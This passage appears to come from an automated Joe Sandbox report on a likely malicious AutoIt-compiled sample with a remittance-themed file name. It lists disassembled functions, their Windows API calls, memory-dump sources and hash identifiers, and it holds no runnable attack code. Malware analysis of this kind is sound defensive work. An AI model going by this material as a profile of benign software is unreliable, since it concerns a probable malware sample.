                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                                                      • String ID:
                                                                      • API String ID: 237123855-0
                                                                      • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                      • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                      • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                      • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteDestroyObject$IconWindow
                                                                      • String ID:
                                                                      • API String ID: 3349847261-0
                                                                      • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                      • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                      • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                      • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                      • String ID:
                                                                      • API String ID: 2223660684-0
                                                                      • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                      • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                      • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                      • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                      APIs
                                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                      • LineTo.GDI32(?,?,?), ref: 00447326
                                                                      • EndPath.GDI32(?), ref: 00447336
                                                                      • StrokePath.GDI32(?), ref: 00447344
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 2783949968-0
                                                                      • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                      • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                      • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                      • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                      • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                      • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 2710830443-0
                                                                      • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                      • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                      • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                      • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                      • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                        • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                        • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                      • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                      • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                      • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00472B63
                                                                      • GetDC.USER32(00000000), ref: 00472B6C
                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                      • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                      • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                      • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00472BB2
                                                                      • GetDC.USER32(00000000), ref: 00472BBB
                                                                      • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                      • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                      • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                      • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                      APIs
                                                                      • __getptd_noexit.LIBCMT ref: 00415150
                                                                        • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                        • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                        • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                        • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                        • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                      • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                      • __freeptd.LIBCMT ref: 0041516B
                                                                      • ExitThread.KERNEL32 ref: 00415173
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                      • String ID:
                                                                      • API String ID: 1454798553-0
                                                                      • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                      • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                      • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                      • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _strncmp
                                                                      • String ID: Q\E
                                                                      • API String ID: 909875538-2189900498
                                                                      • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                      • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                      • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                      • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                      APIs
                                                                      • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                      • String ID: AutoIt3GUI$Container
                                                                      • API String ID: 2652923123-3941886329
                                                                      • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                      • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                      • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                      • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove_strncmp
                                                                      • String ID: U$\
                                                                      • API String ID: 2666721431-100911408
                                                                      • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                      • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                      • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                      • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                      APIs
                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                      • __wcsnicmp.LIBCMT ref: 00467288
                                                                      • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                      • String ID: LPT
                                                                      • API String ID: 3035604524-1350329615
                                                                      • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                      • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                      • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                      • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \$h
                                                                      • API String ID: 4104443479-677774858
                                                                      • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                      • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                      • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                      • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID: &
                                                                      • API String ID: 2931989736-1010288
                                                                      • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
